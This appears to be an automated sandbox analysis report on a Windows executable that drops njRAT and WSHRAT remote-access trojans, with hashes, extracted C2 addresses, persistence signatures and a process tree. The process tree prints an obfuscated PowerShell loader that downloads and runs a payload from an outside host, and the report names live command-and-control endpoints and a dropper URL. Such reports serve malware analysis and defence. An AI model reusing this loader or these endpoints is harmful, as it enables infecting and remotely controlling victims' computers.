Analysis

  • max time kernel
    4s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 04:06

General

  • Target

    DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe

  • Size

    451KB

  • MD5

    8eb05c68a5880d8f15fa787b02192709

  • SHA1

    45813931de14ac2f4f66d412caf9cf6fd236c5c5

  • SHA256

    df15669f7f948abd95d1a4c326aa0443f0cc534513b253accff8bd2549a3f3dc

  • SHA512

    231d122c647684386399ebe117189f1d784f89ae127fb41a061b6d43bec94c7d9cda0f13b6a4ad7f1ad233177f9df43a11c6040180653bf592ee39d3e74708b3

  • SSDEEP

    12288:BjKiWwykMpBMs3qLVmNwCIWaONK6ezkf4BBe/wKA3JIOb2:Bj5bMpf6L2wzWnW38zA3Zi

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://files.catbox.moe/hw5nal.jpg

Extracted

Family

njrat

Version

0.7d

Botnet

ofiss

C2

ofi.dyn.ydns.io:5553

Mutex

cde55e52fb830e966551ebb867b911f6

Attributes
  • reg_key

    cde55e52fb830e966551ebb867b911f6

  • splitter

    |'|'|

Extracted

Family

wshrat

C2

http://ofi.dyn.ydns.io:8000

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe
    "C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2564
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.VBS"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3312
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"
        3⤵
          PID:1064
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
            4⤵
              PID:392
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
              4⤵
                PID:4676
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
                4⤵
                  PID:4112
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.Certificates.Windows.js"
              2⤵
              • Drops startup file
              • Adds Run key to start application
              PID:4484
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Java.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              2⤵
                PID:5060
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ibNAikPWwgtnt($kyIUfjlo, $JTcfKfOUuo){[IO.File]::WriteAllBytes($kyIUfjlo, $JTcfKfOUuo)};function YczpVHAtPXfA($kyIUfjlo){if($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45137,45145,45145))) -eq $True){rundll32.exe $kyIUfjlo }elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45149,45152,45086))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $kyIUfjlo}elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45146,45152,45142))) -eq $True){misexec /qn /i $kyIUfjlo}else{Start-Process $kyIUfjlo}};function ngDXZIlVXFBC($BsVKuudAUmTO){$JJdfgEaJRGBrY = New-Object (pxzGFEDn @(45115,45138,45153,45083,45124,45138,45135,45104,45145,45142,45138,45147,45153));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JTcfKfOUuo = $JJdfgEaJRGBrY.DownloadData($BsVKuudAUmTO);return $JTcfKfOUuo};function pxzGFEDn($bQNW){$fVJWcyxb=45037;$oMKbCTAMoNPeFo=$Null;foreach($TerlvqdlS in $bQNW){$oMKbCTAMoNPeFo+=[char]($TerlvqdlS-$fVJWcyxb)};return $oMKbCTAMoNPeFo};function dPepQKsgLgDssQ(){$iOnAfkNBjQqBeerCG = $env:AppData + '\';$eLfUXisvXwHcf = $iOnAfkNBjQqBeerCG + 'wcqvss.com';If(Test-Path -Path $eLfUXisvXwHcf){Invoke-Item $eLfUXisvXwHcf;}Else{ $xlPtaPUVuQAAoD = ngDXZIlVXFBC (pxzGFEDn @(45141,45153,45153,45149,45152,45095,45084,45084,45139,45142,45145,45138,45152,45083,45136,45134,45153,45135,45148,45157,45083,45146,45148,45138,45084,45156,45136,45150,45155,45152,45152,45083,45136,45148,45146));ibNAikPWwgtnt $eLfUXisvXwHcf $xlPtaPUVuQAAoD;Invoke-Item $eLfUXisvXwHcf;};powershell -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded echo 123;;;;}dPepQKsgLgDssQ;
                  3⤵
                    PID:4012
                    • C:\Users\Admin\AppData\Roaming\wcqvss.com
                      "C:\Users\Admin\AppData\Roaming\wcqvss.com"
                      4⤵
                        PID:1388
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded echo 123
                        4⤵
                          PID:3680
                    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
                      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Certificates.jar"
                      2⤵
                        PID:3056
                      • C:\Users\Admin\AppData\Roaming\sfvip player.exe
                        "C:\Users\Admin\AppData\Roaming\sfvip player.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:224
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -u -p 224 -s 1012
                          3⤵
                          • Program crash
                          PID:1512
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -u -p 224 -s 1012
                          3⤵
                          • Program crash
                          PID:3064
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -pss -s 464 -p 224 -ip 224
                      1⤵
                        PID:1540

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\rrrrrrrr.ps1

                        Filesize

                        437B

                        MD5

                        aa9197aabec7bbbacfb4c9fbf8eb2e0d

                        SHA1

                        261936e557245937e069068839158a09e53c7d8b

                        SHA256

                        29bf616b5bffd07ed28d5d0e69c0fa30d05d45c3e3d9abf1c37f1e56def16435

                        SHA512

                        8e3680b1875d0ff39654c3fe2dee064b2f48973116fb7f1b056255c5547d95d29377794135c405fbd3f6da7c3f6a9629421ce2d9b09f9e4b62256f429cdbe9ed

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                        Filesize

                        1KB

                        MD5

                        4280e36a29fa31c01e4d8b2ba726a0d8

                        SHA1

                        c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                        SHA256

                        e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                        SHA512

                        494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Filesize

                        53KB

                        MD5

                        fc208db13b1239bfa1f4ee94d3505352

                        SHA1

                        c998505025d8ac13f7052a4decd767fdc89020e3

                        SHA256

                        bfb025eec226b78ba8230ab9a034404627919ee26cd9cd3954526b5954b11206

                        SHA512

                        60a8dd3bc269a47ede1459016ca8d641ac6078d8b160c3f12929f56c1f384f89c08a61642acedf59d2bbf4702232eabac6392f12ab9d037a911adce0e73bea67

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        788B

                        MD5

                        ca5f639e334798ffdd4690ed692f203c

                        SHA1

                        4229aed715a3af798d53f75e0e2c516d5329abd9

                        SHA256

                        a7e6ef8c446ff1abc0a5c00c308c135a5862ec9c82482c222fa3f3594ef9e134

                        SHA512

                        b51d905706862b18a20126f8405fbe7fcc6bbc2e6daee830564f90d8cfba718beb6d741efdfd9bea4b1493519f8a20ec589302ea37adfa6aca2a4313f9a75a79

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ypabfx00.24s.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Roaming\Java Certificates.jar

                        Filesize

                        92KB

                        MD5

                        40ce31653e4038c1bfa3ee12c721d71d

                        SHA1

                        4c5057decb82f5338aab304088521a3e977786b0

                        SHA256

                        661c4f08bf45f798dea332d2ba1583ef232e98281350f1ffeefd5b43ae0551ec

                        SHA512

                        ea15a8025e7d6dc59bbfeb80b1ee8529c5c82cafddffe1954c3906d575e252c4a7e2045bf33ef7ce37c9a4f4d7ed1acc17926c13bb585b99ce3a5c9eabfe5f97

                      • C:\Users\Admin\AppData\Roaming\Java.hta

                        Filesize

                        10KB

                        MD5

                        06f39cb0a617f9bba5b8bc829697dd72

                        SHA1

                        33cd123eee708c733de4f6e37ea78d825ab5183f

                        SHA256

                        53dcfe19a536f3965296b2e49fa1f936c90fa2b99b06e71cc00beedadbdfaa97

                        SHA512

                        9f4059679a16938a8f03b168e7931ba2514c2772a7340ba667315ebc1a3b8c24c5b3c749fc57f85bf3872c0b73b7a3a3766b9e86c367e2340865f0797e65349a

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js

                        Filesize

                        475KB

                        MD5

                        3d2ce2ef6ed51c9b9b9eb490f7b6f7f0

                        SHA1

                        d8a147081fb7ce7561481df34aacafb2680f4bf2

                        SHA256

                        ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1

                        SHA512

                        d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5

                      • C:\Users\Admin\AppData\Roaming\System.Certificates.Windows.js

                        Filesize

                        475KB

                        MD5

                        3d2ce2ef6ed51c9b9b9eb490f7b6f7f0

                        SHA1

                        d8a147081fb7ce7561481df34aacafb2680f4bf2

                        SHA256

                        ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1

                        SHA512

                        d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5

                      • C:\Users\Admin\AppData\Roaming\System.VBS

                        Filesize

                        984B

                        MD5

                        9d848c9972c6a431b81a38a9c184ea2b

                        SHA1

                        027939ca3d01ac4f7bde80381ba9f4dd8e1ac281

                        SHA256

                        6d1ca16b766a343630f954fff0e5ca159d82e55ffc197d4d2e23e71c8a61f4d3

                        SHA512

                        fbdbfed4a779713e0f9324b082ad9462afb03e7ba97aad1357ec3f615e757a8eec2b4700d59a6f17a3f408b0478a88e5d54e374d885db4cf4d2120784b2a7163

                      • C:\Users\Admin\AppData\Roaming\sfvip player.exe

                        Filesize

                        802KB

                        MD5

                        9cd16366ca3486523fcbbda63bc8c16b

                        SHA1

                        6f773925b546c0e5ff76b7ef29d0671033b53cfe

                        SHA256

                        21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

                        SHA512

                        f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

                      • C:\Users\Admin\AppData\Roaming\sfvip player.exe

                        Filesize

                        802KB

                        MD5

                        9cd16366ca3486523fcbbda63bc8c16b

                        SHA1

                        6f773925b546c0e5ff76b7ef29d0671033b53cfe

                        SHA256

                        21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

                        SHA512

                        f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

                      • C:\Users\Admin\AppData\Roaming\sfvip player.exe

                        Filesize

                        802KB

                        MD5

                        9cd16366ca3486523fcbbda63bc8c16b

                        SHA1

                        6f773925b546c0e5ff76b7ef29d0671033b53cfe

                        SHA256

                        21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

                        SHA512

                        f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

                      • C:\Users\Admin\AppData\Roaming\wcqvss.com

                        Filesize

                        22KB

                        MD5

                        44a163b10ef8607658aab1295a5a1e8a

                        SHA1

                        a498c30c4189c1e69c94a2121e72f73c7e0e727d

                        SHA256

                        99d130bf6fd7381a42190e506aa5f6db9b0503d88f0b4f80fbe8ae83576a9da8

                        SHA512

                        390f646e1b2a0925f49932c42f50ff963efc25bd45f692e2f0eb9fd392496289f096901db35170b0497cdcf6927636577cc9b0d0decb88423b4455a176111991

                      • C:\Users\Admin\AppData\Roaming\wcqvss.com

                        Filesize

                        22KB

                        MD5

                        44a163b10ef8607658aab1295a5a1e8a

                        SHA1

                        a498c30c4189c1e69c94a2121e72f73c7e0e727d

                        SHA256

                        99d130bf6fd7381a42190e506aa5f6db9b0503d88f0b4f80fbe8ae83576a9da8

                        SHA512

                        390f646e1b2a0925f49932c42f50ff963efc25bd45f692e2f0eb9fd392496289f096901db35170b0497cdcf6927636577cc9b0d0decb88423b4455a176111991

                      • memory/224-177-0x000001E102B40000-0x000001E102B50000-memory.dmp

                        Filesize

                        64KB

                      • memory/224-160-0x000001E100F70000-0x000001E10103E000-memory.dmp

                        Filesize

                        824KB

                      • memory/1064-232-0x00000000027F0000-0x0000000002800000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-245-0x00000000027F0000-0x0000000002800000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-168-0x0000000002800000-0x0000000002836000-memory.dmp

                        Filesize

                        216KB

                      • memory/1064-255-0x0000000007D30000-0x00000000083AA000-memory.dmp

                        Filesize

                        6.5MB

                      • memory/1064-187-0x00000000027F0000-0x0000000002800000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-181-0x00000000027F0000-0x0000000002800000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-178-0x0000000005CE0000-0x0000000005D02000-memory.dmp

                        Filesize

                        136KB

                      • memory/1064-231-0x00000000027F0000-0x0000000002800000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-174-0x00000000052E0000-0x0000000005908000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/1388-330-0x00000000019B0000-0x00000000019C0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3056-292-0x0000000000D60000-0x0000000000D61000-memory.dmp

                        Filesize

                        4KB

                      • memory/3056-175-0x0000000000D60000-0x0000000000D61000-memory.dmp

                        Filesize

                        4KB

                      • memory/3056-224-0x0000000000D60000-0x0000000000D61000-memory.dmp

                        Filesize

                        4KB

                      • memory/3056-280-0x0000000000D60000-0x0000000000D61000-memory.dmp

                        Filesize

                        4KB

                      • memory/3056-215-0x0000000000D60000-0x0000000000D61000-memory.dmp

                        Filesize

                        4KB

                      • memory/3056-263-0x0000000000D60000-0x0000000000D61000-memory.dmp

                        Filesize

                        4KB

                      • memory/3680-326-0x0000000002F80000-0x0000000002F90000-memory.dmp

                        Filesize

                        64KB

                      • memory/3680-324-0x0000000002F80000-0x0000000002F90000-memory.dmp

                        Filesize

                        64KB

                      • memory/4012-252-0x00000000079C0000-0x0000000007F64000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/4012-250-0x0000000000C20000-0x0000000000C42000-memory.dmp

                        Filesize

                        136KB

                      • memory/4012-179-0x0000000005AE0000-0x0000000005B46000-memory.dmp

                        Filesize

                        408KB

                      • memory/4012-248-0x00000000009A0000-0x00000000009BA000-memory.dmp

                        Filesize

                        104KB

                      • memory/4012-246-0x0000000007370000-0x0000000007406000-memory.dmp

                        Filesize

                        600KB

                      • memory/4012-243-0x0000000002880000-0x0000000002890000-memory.dmp

                        Filesize

                        64KB

                      • memory/4012-235-0x0000000002880000-0x0000000002890000-memory.dmp

                        Filesize

                        64KB

                      • memory/4012-193-0x0000000002880000-0x0000000002890000-memory.dmp

                        Filesize

                        64KB

                      • memory/4012-192-0x0000000002880000-0x0000000002890000-memory.dmp

                        Filesize

                        64KB

                      • memory/4012-328-0x0000000002880000-0x0000000002890000-memory.dmp

                        Filesize

                        64KB

                      • memory/4012-207-0x0000000006190000-0x00000000061AE000-memory.dmp

                        Filesize

                        120KB

                      • memory/4012-180-0x0000000005B50000-0x0000000005BB6000-memory.dmp

                        Filesize

                        408KB

                      • memory/4112-301-0x0000000000400000-0x000000000040A000-memory.dmp

                        Filesize

                        40KB